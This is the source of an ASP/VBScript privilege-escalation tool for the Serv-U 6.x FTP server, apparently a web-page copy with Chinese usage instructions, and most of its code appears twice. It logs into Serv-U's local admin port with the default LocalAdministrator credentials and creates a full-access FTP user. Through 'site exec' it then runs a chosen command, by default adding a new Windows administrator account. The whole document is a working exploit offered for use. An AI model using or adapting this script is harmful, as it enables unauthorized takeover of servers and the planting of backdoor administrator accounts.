Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
1
<
%@ LANGUAGE
=
VBScript %
>
2 < %
3 Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4 dim action
5 action = request( " action " )
6 if not isnumeric (action) then response.end
7 user = trim (request( " u " ))
8 pass = trim (request( " p " ))
9 port = trim (request( " port " ))
10 cmd = trim (request( " c " ))
11 f = trim (request( " f " ))
12 if f = "" then
13 f = gpath()
14 else
15 f = left (f, 2 )
16 end if
17 ftpport = ffport
18 timeout = 3
19
20 loginuser = " User " & user & vbCrLf
21 loginpass = " Pass " & pass & vbCrLf
22 deldomain = " -DELETEDOMAIN " & vbCrLf & " -IP= " & iip & vbCrLf & " PortNo= " & ftpport & vbCrLf
23 mt = " SITE MAINTENANCE " & vbCrLf
24 newdomain = " -SETDOMAIN " & vbCrLf & " -Domain=leaves| " & iip & " | " & ftpport & " |-1|1|0 " & vbCrLf & " -TZOEnable=0 " & vbCrLf & " TZOKey= " & vbCrLf
25 newuser = " -SETUSERSETUP " & vbCrLf & " -IP=0.0.0.0 " & vbCrLf & " -PortNo= " & ftpport & vbCrLf & " -User=luo " & vbCrLf & " -Password=ye " & vbCrLf & _
26 " -HomeDir=c:\\ " & vbCrLf & " -LoginMesFile= " & vbCrLf & " -Disable=0 " & vbCrLf & " -RelPaths=1 " & vbCrLf & _
27 " -NeedSecure=0 " & vbCrLf & " -HideHidden=0 " & vbCrLf & " -AlwaysAllowLogin=0 " & vbCrLf & " -ChangePassword=0 " & vbCrLf & _
28 " -QuotaEnable=0 " & vbCrLf & " -MaxUsersLoginPerIP=-1 " & vbCrLf & " -SpeedLimitUp=0 " & vbCrLf & " -SpeedLimitDown=0 " & vbCrLf & _
29 " -MaxNrUsers=-1 " & vbCrLf & " -IdleTimeOut=600 " & vbCrLf & " -SessionTimeOut=-1 " & vbCrLf & " -Expire=0 " & vbCrLf & " -RatioUp=1 " & vbCrLf & _
30 " -RatioDown=1 " & vbCrLf & " -RatiosCredit=0 " & vbCrLf & " -QuotaCurrent=0 " & vbCrLf & " -QuotaMaximum=0 " & vbCrLf & _
31 " -Maintenance=System " & vbCrLf & " -PasswordType=Regular " & vbCrLf & " -Ratios=None " & vbCrLf & " Access=c:\\|RWAMELCDP " & vbCrLf
32 quit = " QUIT " & vbCrLf
33 newuser = replace (newuser, " c: " ,f)
34 select case action
35 case 1
36 set a = Server.CreateObject( " Microsoft.XMLHTTP " )
37 a.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s1 " , True , "" , ""
38 a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39 set session( " a " ) = a
40 % >
41 < form method = " post " name = " leaves " >
42 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
43 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
44 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
45 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
46 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
47 < input name = " action " type = " hidden " id = " action " value = " 2 " ></ form >
48 < script language = " javascript " >
49 document.write( ' <center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%><center>');
50 setTimeout( " document.all.leaves.submit(); " , 4000 );
51 </ script >
52 < %
53 case 2
54 set b = Server.CreateObject( " Microsoft.XMLHTTP " )
55 b.open " GET " , " http://127.0.0.1: " & ftpport & " /leaves/upadmin/s2 " , True , "" , ""
56 b.send " User luo " & vbCrLf & " pass ye " & vbCrLf & " site exec " & cmd & vbCrLf & quit
57 set session( " b " ) = b
58 % >
59 < form method = " post " name = " leaves " >
60 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
61 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
62 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
63 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
64 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
65 < input name = " action " type = " hidden " id = " action " value = " 3 " ></ form >
66 < script language = " javascript " >
67 document.write( ' <center>正在提升权限,请等待,<center>');
68 setTimeout( " document.all.leaves.submit(); " , 4000 );
69 </ script >
70 < %
71 case 3
72 set c = Server.CreateObject( " Microsoft.XMLHTTP " )
73 c.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s3 " , True , "" , ""
74 c.send loginuser & loginpass & mt & deldomain & quit
75 set session( " c " ) = c
76 % >
77 < center > 提权完毕,已执行了命令:
78 < font color = red >< % = cmd% ></ font >
79
80
81 < input type = button value = " 返回继续 " onClick = " location.href='<%=gname()%>'; " >
82 </ center >
83
84 < %
85 case else
86 on error resume next
87 set a = session( " a " )
88 set b = session( " b " )
89 set c = session( " c " )
90 a.abort
91 Set a = Nothing
92 b.abort
93 Set b = Nothing
94 c.abort
95 Set c = Nothing
96 % >
97 < center >< form method = " post " name = " leaves " >
98 < tr align = " center " valign = " middle " >
99 < td colspan = " 2 " > Serv - U 6 .X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆 </ td >
100
101 </ tr >
102 < tr align = " center " valign = " middle " >
103 < td width = " 200 " > 用户名: </ td >
104
105 < td width = " 400 " >< input name = " u " type = " text " id = " u " value = " LocalAdministrator " ></ td >
106
107 </ tr >
108 < tr align = " center " valign = " middle " >
109 < td > 口 令: </ td >
110
111 < td >< input name = " p " type = " text " id = " p " value = " #l@$ak#.lk;0@P " ></ td >
112
113 </ tr >
114 < tr align = " center " valign = " middle " >
115 < td > 端 口: </ td >
116
117 < td >< input name = " port " type = " text " id = " port " value = " 43958 " ></ td >
118
119 服务器端口:
120
121 < td >< input name = " ffport " type = " text " id = " ffport " value = " 65500 " ></ td >
122
123 服务器IP:
124
125 < td >< input name = " iip " type = " text " id = " iip " value = " 0.0.0.0 " ></ td >
126
127 </ tr >
128 < tr align = " center " valign = " middle " >
129 < td > 系统路径: </ td >
130
131 < td >< input name = " f " type = " text " id = " f " value = " <%=f%> " size = " 8 " ></ td >
132
133 </ tr >
134 < tr align = " center " valign = " middle " >
135 < td > 命 令: </ td >
136
137 < td >< input name = " c " type = " text " id = " c " value = " cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add " size = " 50 " ></ td >
138
139 </ tr >
140 < tr align = " center " valign = " middle " >
141 < td colspan = " 2 " >< input type = " submit " name = " Submit " value = " 提交 " >
142 < input type = " reset " name = " Submit2 " value = " 重置 " >
143 < input name = " action " type = " hidden " id = " action " value = " 1 " ></ td >
144 </ tr >
145 </ form ></ center >
146
147
148 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149 < % end select
150 function Gpath()
151 on error resume next
152 err.clear
153 set f = Server.CreateObject( " Scripting.FileSystemObject " )
154 if err.number > 0 then
155 gpath = " c: "
156 exit function
157 end if
158 gpath = f.GetSpecialFolder( 0 )
159 gpath = lcase ( left (gpath, 2 ))
160 set f = nothing
161 end function
162 Function GName()
163 If request.servervariables( " SERVER_PORT " ) = " 80 " Then
164 GName = " http:// " & request.servervariables( " server_name " ) & lcase (request.servervariables( " script_name " ))
165 Else
166 GName = " http:// " & request.servervariables( " server_name " ) & " : " & request.servervariables( " SERVER_PORT " ) & lcase (request.servervariables( " script_name " ))
167 End If
168 End Function
169 % >
170
2 < %
3 Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4 dim action
5 action = request( " action " )
6 if not isnumeric (action) then response.end
7 user = trim (request( " u " ))
8 pass = trim (request( " p " ))
9 port = trim (request( " port " ))
10 cmd = trim (request( " c " ))
11 f = trim (request( " f " ))
12 if f = "" then
13 f = gpath()
14 else
15 f = left (f, 2 )
16 end if
17 ftpport = ffport
18 timeout = 3
19
20 loginuser = " User " & user & vbCrLf
21 loginpass = " Pass " & pass & vbCrLf
22 deldomain = " -DELETEDOMAIN " & vbCrLf & " -IP= " & iip & vbCrLf & " PortNo= " & ftpport & vbCrLf
23 mt = " SITE MAINTENANCE " & vbCrLf
24 newdomain = " -SETDOMAIN " & vbCrLf & " -Domain=leaves| " & iip & " | " & ftpport & " |-1|1|0 " & vbCrLf & " -TZOEnable=0 " & vbCrLf & " TZOKey= " & vbCrLf
25 newuser = " -SETUSERSETUP " & vbCrLf & " -IP=0.0.0.0 " & vbCrLf & " -PortNo= " & ftpport & vbCrLf & " -User=luo " & vbCrLf & " -Password=ye " & vbCrLf & _
26 " -HomeDir=c:\\ " & vbCrLf & " -LoginMesFile= " & vbCrLf & " -Disable=0 " & vbCrLf & " -RelPaths=1 " & vbCrLf & _
27 " -NeedSecure=0 " & vbCrLf & " -HideHidden=0 " & vbCrLf & " -AlwaysAllowLogin=0 " & vbCrLf & " -ChangePassword=0 " & vbCrLf & _
28 " -QuotaEnable=0 " & vbCrLf & " -MaxUsersLoginPerIP=-1 " & vbCrLf & " -SpeedLimitUp=0 " & vbCrLf & " -SpeedLimitDown=0 " & vbCrLf & _
29 " -MaxNrUsers=-1 " & vbCrLf & " -IdleTimeOut=600 " & vbCrLf & " -SessionTimeOut=-1 " & vbCrLf & " -Expire=0 " & vbCrLf & " -RatioUp=1 " & vbCrLf & _
30 " -RatioDown=1 " & vbCrLf & " -RatiosCredit=0 " & vbCrLf & " -QuotaCurrent=0 " & vbCrLf & " -QuotaMaximum=0 " & vbCrLf & _
31 " -Maintenance=System " & vbCrLf & " -PasswordType=Regular " & vbCrLf & " -Ratios=None " & vbCrLf & " Access=c:\\|RWAMELCDP " & vbCrLf
32 quit = " QUIT " & vbCrLf
33 newuser = replace (newuser, " c: " ,f)
34 select case action
35 case 1
36 set a = Server.CreateObject( " Microsoft.XMLHTTP " )
37 a.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s1 " , True , "" , ""
38 a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39 set session( " a " ) = a
40 % >
41 < form method = " post " name = " leaves " >
42 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
43 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
44 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
45 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
46 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
47 < input name = " action " type = " hidden " id = " action " value = " 2 " ></ form >
48 < script language = " javascript " >
49 document.write( ' <center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%><center>');
50 setTimeout( " document.all.leaves.submit(); " , 4000 );
51 </ script >
52 < %
53 case 2
54 set b = Server.CreateObject( " Microsoft.XMLHTTP " )
55 b.open " GET " , " http://127.0.0.1: " & ftpport & " /leaves/upadmin/s2 " , True , "" , ""
56 b.send " User luo " & vbCrLf & " pass ye " & vbCrLf & " site exec " & cmd & vbCrLf & quit
57 set session( " b " ) = b
58 % >
59 < form method = " post " name = " leaves " >
60 < input name = " u " type = " hidden " id = " u " value = " <%=user%> " ></ td >
61 < input name = " p " type = " hidden " id = " p " value = " <%=pass%> " ></ td >
62 < input name = " port " type = " hidden " id = " port " value = " <%=port%> " ></ td >
63 < input name = " c " type = " hidden " id = " c " value = " <%=cmd%> " size = " 50 " >
64 < input name = " f " type = " hidden " id = " f " value = " <%=f%> " size = " 50 " >
65 < input name = " action " type = " hidden " id = " action " value = " 3 " ></ form >
66 < script language = " javascript " >
67 document.write( ' <center>正在提升权限,请等待,<center>');
68 setTimeout( " document.all.leaves.submit(); " , 4000 );
69 </ script >
70 < %
71 case 3
72 set c = Server.CreateObject( " Microsoft.XMLHTTP " )
73 c.open " GET " , " http://127.0.0.1: " & port & " /leaves/upadmin/s3 " , True , "" , ""
74 c.send loginuser & loginpass & mt & deldomain & quit
75 set session( " c " ) = c
76 % >
77 < center > 提权完毕,已执行了命令:
78 < font color = red >< % = cmd% ></ font >
79
80
81 < input type = button value = " 返回继续 " onClick = " location.href='<%=gname()%>'; " >
82 </ center >
83
84 < %
85 case else
86 on error resume next
87 set a = session( " a " )
88 set b = session( " b " )
89 set c = session( " c " )
90 a.abort
91 Set a = Nothing
92 b.abort
93 Set b = Nothing
94 c.abort
95 Set c = Nothing
96 % >
97 < center >< form method = " post " name = " leaves " >
98 < tr align = " center " valign = " middle " >
99 < td colspan = " 2 " > Serv - U 6 .X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆 </ td >
100
101 </ tr >
102 < tr align = " center " valign = " middle " >
103 < td width = " 200 " > 用户名: </ td >
104
105 < td width = " 400 " >< input name = " u " type = " text " id = " u " value = " LocalAdministrator " ></ td >
106
107 </ tr >
108 < tr align = " center " valign = " middle " >
109 < td > 口 令: </ td >
110
111 < td >< input name = " p " type = " text " id = " p " value = " #l@$ak#.lk;0@P " ></ td >
112
113 </ tr >
114 < tr align = " center " valign = " middle " >
115 < td > 端 口: </ td >
116
117 < td >< input name = " port " type = " text " id = " port " value = " 43958 " ></ td >
118
119 服务器端口:
120
121 < td >< input name = " ffport " type = " text " id = " ffport " value = " 65500 " ></ td >
122
123 服务器IP:
124
125 < td >< input name = " iip " type = " text " id = " iip " value = " 0.0.0.0 " ></ td >
126
127 </ tr >
128 < tr align = " center " valign = " middle " >
129 < td > 系统路径: </ td >
130
131 < td >< input name = " f " type = " text " id = " f " value = " <%=f%> " size = " 8 " ></ td >
132
133 </ tr >
134 < tr align = " center " valign = " middle " >
135 < td > 命 令: </ td >
136
137 < td >< input name = " c " type = " text " id = " c " value = " cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add " size = " 50 " ></ td >
138
139 </ tr >
140 < tr align = " center " valign = " middle " >
141 < td colspan = " 2 " >< input type = " submit " name = " Submit " value = " 提交 " >
142 < input type = " reset " name = " Submit2 " value = " 重置 " >
143 < input name = " action " type = " hidden " id = " action " value = " 1 " ></ td >
144 </ tr >
145 </ form ></ center >
146
147
148 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149 < % end select
150 function Gpath()
151 on error resume next
152 err.clear
153 set f = Server.CreateObject( " Scripting.FileSystemObject " )
154 if err.number > 0 then
155 gpath = " c: "
156 exit function
157 end if
158 gpath = f.GetSpecialFolder( 0 )
159 gpath = lcase ( left (gpath, 2 ))
160 set f = nothing
161 end function
162 Function GName()
163 If request.servervariables( " SERVER_PORT " ) = " 80 " Then
164 GName = " http:// " & request.servervariables( " server_name " ) & lcase (request.servervariables( " script_name " ))
165 Else
166 GName = " http:// " & request.servervariables( " server_name " ) & " : " & request.servervariables( " SERVER_PORT " ) & lcase (request.servervariables( " script_name " ))
167 End If
168 End Function
169 % >
170